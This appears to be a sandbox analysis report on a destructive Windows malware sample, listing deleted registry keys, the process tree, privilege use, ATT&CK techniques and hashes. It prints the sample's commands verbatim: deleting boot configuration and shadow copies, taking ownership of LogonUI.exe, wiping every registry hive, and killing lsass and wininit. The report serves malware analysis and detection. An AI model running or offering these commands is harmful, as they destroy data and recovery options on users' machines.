Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.mid\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493497-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.Template.8\shell\Open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{2E7AC8A7-CF9C-3C1D-ACC7-2605667BFCBF}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0019-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000244D4-0000-0000-C000-000000000046}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\VLC.3g2\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.WMD	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0002442A-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E101-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.p7r	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0002099B-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\themepackfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{978C9E23-D4B0-11CE-BF2D-00AA003F40D0}\Implemented Categories	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0091-ABCDEFFEDCBB}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{51973C55-CB0C-11D0-B5C9-00A0244A0E7A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20E823C2-62F3-4638-96BD-90F4F6784EBC}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5052A832-2C0F-46c7-B67C-1F1FEC37B280}\ToolboxBitmap32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{359EAB69-7EA9-3179-B5D8-808A3CA74365}\15.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.protocol\ms-getoffice\AppXmv9vjzaeg21cc3hba9zs3k9vcdp3c6jm	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0098-ABCDEFFEDCBB}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0013-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{30590075-98B5-11CF-BB82-00AA00BDCE0B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\AllSyncRootObjects	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020907-0000-0000-C000-000000000046}\DataFormats\GetSet\4	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{000209FF-0000-0000-C000-000000000046}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\IE.AssocFile.PARTIAL\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\DefaultExtension	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{9C46779B-5D34-399B-8F02-1FD193FDE323}	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Extensions\ContractId\Windows.Launch\PackageId\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0016-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Forms.HTML:Select.1\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\ddeexec\Application	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{E87FA4D7-0CAA-3C24-BE83-CF98B50186E2}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{30510736-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32	reg.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

3344 reg.exe
2340 reg.exe

pid	process
3344	reg.exe
2340	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

vssvc.exetakeown.exe

description	pid	process
Token: SeBackupPrivilege	3856	vssvc.exe
Token: SeRestorePrivilege	3856	vssvc.exe
Token: SeAuditPrivilege	3856	vssvc.exe
Token: SeTakeOwnershipPrivilege	4176	takeown.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.execmd.exe

description	pid	process	target process
PID 4660 wrote to memory of 3592	4660	1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe	cmd.exe
PID 4660 wrote to memory of 3592	4660	1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe	cmd.exe
PID 3592 wrote to memory of 4252	3592	cmd.exe	bcdedit.exe
PID 3592 wrote to memory of 4252	3592	cmd.exe	bcdedit.exe
PID 3592 wrote to memory of 4276	3592	cmd.exe	vssadmin.exe
PID 3592 wrote to memory of 4276	3592	cmd.exe	vssadmin.exe
PID 3592 wrote to memory of 4176	3592	cmd.exe	takeown.exe
PID 3592 wrote to memory of 4176	3592	cmd.exe	takeown.exe
PID 3592 wrote to memory of 4116	3592	cmd.exe	icacls.exe
PID 3592 wrote to memory of 4116	3592	cmd.exe	icacls.exe
PID 3592 wrote to memory of 3344	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 3344	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 904	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 904	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 1080	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 1080	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 1108	3592	cmd.exe	reg.exe
PID 3592 wrote to memory of 1108	3592	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe
"C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6632.tmp\6633.tmp\6634.bat C:\Users\Admin\AppData\Local\Temp\1383b80440ad105c0899143a80472ca844cc9c23de6d4e59777eb7f464747813.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\System32\bcdedit.exe
bcdedit /delete {current}
3⤵
- Modifies boot configuration data using bcdedit
PID:4252

C:\Windows\System32\vssadmin.exe
vssadmin delete shadows /for=c: /all /quiet
3⤵
- Interacts with shadow copies
PID:4276

C:\Windows\System32\takeown.exe
takeown /f LogonUI.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4176

C:\Windows\System32\icacls.exe
icacls LogonUI.exe /grant Admin:f
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4116

C:\Windows\System32\reg.exe
reg delete HKCU /f
3⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
- Modifies registry key
PID:3344

C:\Windows\System32\reg.exe
reg delete HKU /f
3⤵
- Adds Run key to start application
- Modifies data under HKEY_USERS
PID:904

C:\Windows\System32\reg.exe
reg delete HKCC /f
3⤵
PID:1080

C:\Windows\System32\reg.exe
reg delete HKCR /f
3⤵
- Modifies system executable filetype association
- Modifies registry class
PID:1108

C:\Windows\System32\taskkill.exe
taskkill /im lsass.exe /f /t
3⤵
- Kills process with taskkill
PID:1692

C:\Windows\System32\reg.exe
reg delete HKLM /f
3⤵
- Modifies registry key
PID:2340

C:\Windows\System32\taskkill.exe
taskkill /im wininit.exe /f /t
3⤵
- Kills process with taskkill
PID:3632

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3856

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
1⤵
PID:2472

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Change Default File Association

1

T1042

Registry Run Keys / Startup Folder

3

T1060

Privilege Escalation

Defense Evasion

Modify Registry

5

T1112

File Deletion

2

T1107

File Permissions Modification

1

T1222

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6632.tmp\6633.tmp\6634.bat
MD5
38dc7703a0a8fddc5870776a3b4e662c

SHA1
4fd989609b186842874ce1dba6b32ab71bc77881

SHA256
5636818caa00d72d10df36a8b37cd355d74855c5cf891aeaf468c19d1f08176c

SHA512
dd89c0adcaa1b5122eddda514d9cebe3cc100f2aed13192ba1e58ffb1848bed5c46c6b9d2762e3d1a0da01d5f099cada05a99167f675768f6573b8ef983f5291

Download Submit
memory/904-121-0x0000000000000000-mapping.dmp

Download
memory/1080-122-0x0000000000000000-mapping.dmp

Download
memory/1108-123-0x0000000000000000-mapping.dmp

Download
memory/1692-124-0x0000000000000000-mapping.dmp

Download
memory/2340-125-0x0000000000000000-mapping.dmp

Download
memory/3344-120-0x0000000000000000-mapping.dmp

Download
memory/3592-114-0x0000000000000000-mapping.dmp

Download
memory/4116-119-0x0000000000000000-mapping.dmp

Download
memory/4176-118-0x0000000000000000-mapping.dmp

Download
memory/4252-116-0x0000000000000000-mapping.dmp

Download
memory/4276-117-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads